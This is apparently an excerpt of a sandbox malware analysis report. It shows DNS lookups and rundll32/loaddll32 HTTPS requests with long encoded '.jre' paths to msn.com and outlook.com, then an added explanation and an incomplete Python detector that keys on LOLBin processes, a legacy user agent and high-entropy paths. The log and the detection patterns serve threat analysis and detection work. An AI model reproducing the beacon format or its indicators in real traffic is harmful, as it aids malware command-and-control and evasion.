Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    www.outlook.com             outlook.office365.com            -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    outlook.office365.com       outlook.ha.office365.com         -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    outlook.ha.office365.com    outlook.ms-acdc.office.com       -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    outlook.ms-acdc.office.com  HHN-efz.ms-acdc.office.com       -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    HHN-efz.ms-acdc.office.com  -                                52.98.152.242  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    HHN-efz.ms-acdc.office.com  -                                52.98.207.210  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    HHN-efz.ms-acdc.office.com  -                                52.98.208.66   A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST  8.8.8.8    192.168.2.5  0xdf9c    No error (0)    HHN-efz.ms-acdc.office.com  -                                40.101.8.162   A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    outlook.office365.com       outlook.ha.office365.com         -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    outlook.ha.office365.com    outlook.ms-acdc.office.com       -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    outlook.ms-acdc.office.com  FRA-efz.ms-acdc.office.com       -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    FRA-efz.ms-acdc.office.com  -                                52.97.137.242  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    FRA-efz.ms-acdc.office.com  -                                52.98.208.34   A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST  8.8.8.8    192.168.2.5  0x348e    No error (0)    FRA-efz.ms-acdc.office.com  -                                40.101.124.18  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST  8.8.8.8    192.168.2.5  0x62a1    No error (0)    outlook.com                 -                                40.97.161.50   A (IP address)          IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.98.208.66A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.97.157.162A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.97.212.34A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com40.101.9.178A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.151.98A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.147.2A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:27.497742891 CEST8.8.8.8192.168.2.50x5457Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:28.635253906 CEST8.8.8.8192.168.2.50xa4f3Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49765 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:50:23 UTC | 0 | OUT | GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:50:23 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:50:23 GMT
Connection: close
Content-Length: 374
2021-10-11 20:50:23 UTC | 0 | IN | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 6a 58 54 76 52 55 33 37 58 2f 6b 4b 41 4e 36 32 75 42 64 33 74 44 54 34 55 75 76 58 66 37 2f 74 76 32 70 61 36 35 30 71 5f 32 42 4e 63 34 67 5a 78 5f 2f 32 46 54 58 65 4b 48 33 47 44 79 44 71 75 66 7a 5a 61 6b 66 76 4b 2f 5f 32 42 43 4e 58 61 6c 6c 6f 6f 71 37 2f 56 4f 44 4d 6b 6d 4e 46 2f 48 4c 68 4c 71 38 4d 4f 4b 63 77 69 76 55 4d 4d 78 4d 67
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49766 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:50:23 UTC | 1 | OUT | GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:50:24 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:50:23 GMT
Connection: close
Content-Length: 402
2021-10-11 20:50:24 UTC | 2 | IN | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 52 53 54 4f 6b 4a 43 42 48 63 51 54 6c 58 33 37 32 6b 56 55 2f 58 62 45 54 35 33 32 55 75 6b 71 33 79 78 50 66 65 67 41 2f 72 4b 38 6a 67 5f 32 46 59 66 49 69 4e 45 31 53 6e 5f 32 46 46 43 2f 54 7a 42 33 67 42 63 32 32 4e 54 38 57 2f 53 45 70 43 61 59 42 68 2f 4e 7a 5f 32 46 66 5a 52 45 63 47 5f 32 42 4c 67 4d 7a 30 41 6d 5a 77 2f 48 65 66 30 43
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0C


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49785 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:51:06 UTC | 2 | OUT | GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:51:07 UTC | 3 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre
Server: Microsoft-IIS/10.0
request-id: 0d39011c-5f71-d4f2-94a2-b4740c04222e
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0029
X-RequestId: 2496765a-2f5e-4b25-a5c1-1a7921663dbf
MS-CV: HAE5DXFf8tSUorR0DAQiLg.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0029
Date: Mon, 11 Oct 2021 20:51:06 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49786 | 52.98.152.242 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:51:07 UTC | 3 | OUT | GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 20:51:07 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre
Server: Microsoft-IIS/10.0
request-id: 20c73dfc-91cc-b1e4-fc6c-e6c0f5a079a5
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: FR0P281CA0081
X-RequestId: b31cb493-e0fd-45f3-b44e-e5d953cc9c82
MS-CV: /D3HIMyR5LH8bObA9aB5pQ.0
X-Powered-By: ASP.NET
X-FEServer: FR0P281CA0081
Date: Mon, 11 Oct 2021 20:51:06 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49787 | 52.97.137.242 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:51:07 UTC | 4 | OUT | GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 20:51:07 UTC | 5 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: AM0PR03CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COM
X-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1
X-FEServer: AM0PR03CA0028
X-Powered-By: ASP.NET
X-FEServer: AM6P195CA0091
Date: Mon, 11 Oct 2021 20:51:06 GMT
Connection: close
2021-10-11 20:51:07 UTC | 5 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49788 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:51:07 UTC | 7 | OUT | GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:51:07 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre
Server: Microsoft-IIS/10.0
request-id: 147732a4-d3b1-c9bb-f944-8ef989c698f5
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0038
X-RequestId: 669cb4a2-e956-4302-840a-f8c92f7287f1
MS-CV: pDJ3FLHTu8n5RI75icaY9Q.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0038
Date: Mon, 11 Oct 2021 20:51:07 GMT
Connection: close
Content-Length: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.54978952.98.208.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                          Timestamp                kBytes transferred  Direction  Data
                                                                                          2021-10-11 20:51:08 UTC  8                   OUT        GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: www.outlook.com
                                                                                          2021-10-11 20:51:08 UTC  8                   IN         HTTP/1.1 301 Moved Permanently
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Location: https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: c3b60ebc-4628-a210-61a3-c0befcc5de97
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-FEServer: AS9PR06CA0083
                                                                                          X-RequestId: 6a98d4fd-3718-43df-872f-1dc2d4341b22
                                                                                          MS-CV: vA62wyhGEKJho8C+/MXelw.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: AS9PR06CA0083
                                                                                          Date: Mon, 11 Oct 2021 20:51:07 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                          7           192.168.2.5  49790        40.101.9.178    443               C:\Windows\SysWOW64\rundll32.exe
                                                                                          Timestamp                kBytes transferred  Direction  Data
                                                                                          2021-10-11 20:51:08 UTC  9                   OUT        GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: outlook.office365.com
                                                                                          2021-10-11 20:51:08 UTC  9                   IN         HTTP/1.1 404 Not Found
                                                                                          Content-Length: 1245
                                                                                          Content-Type: text/html
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3c
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.com
                                                                                          X-BackEndHttpStatus: 404
                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                          MS-CV: B8NWasbp8cSTveuDcqZrPA.1
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: AM5PR0201CA0014
                                                                                          Date: Mon, 11 Oct 2021 20:51:07 GMT
                                                                                          Connection: close
                                                                                          2021-10-11 20:51:08 UTC  10                  IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
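
The two sessions above carry the signals a detection engineer keys on: rundll32.exe, a signed Windows binary, issuing its own HTTP GET; a legacy Internet Explorer 8 User-Agent; and a long path of random-looking segments ending in an extension that makes no sense for a web request (.jre). The request was redirected 301 from www.outlook.com to outlook.office365.com and answered 404. The following Python is an added example and not part of the Joe Sandbox report: it scores proxy or EDR network records on those four signals. The record layout, the thresholds and the odd-extension set beyond .jre are assumptions for illustration; the sample records are constructed, the first reproducing the rundll32.exe request from session 6.

```python
import math
import re
from collections import Counter
from typing import Dict, List, Tuple

# Legacy IE user agents such as the one rundll32.exe sent in session 6.
LEGACY_UA = re.compile(r"Mozilla/4\.0 \(compatible; MSIE [678]\.0; Windows NT")

# Signed Windows binaries that should not originate HTTP traffic themselves.
LOLBIN_PROCS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Extensions that are odd for a web request; .jre is from the report,
# the others are assumptions added for illustration.
ODD_EXTS = {".jre", ".avi", ".bmp"}

# Thresholds are assumptions for illustration, not tuned values.
MIN_SEGMENTS = 6
MIN_PATH_CHARS = 120
MIN_ENTROPY_BITS = 4.5


def shannon_entropy(s: str) -> float:
    """Bits per character; random mixed-case alphanumerics score well above 4."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


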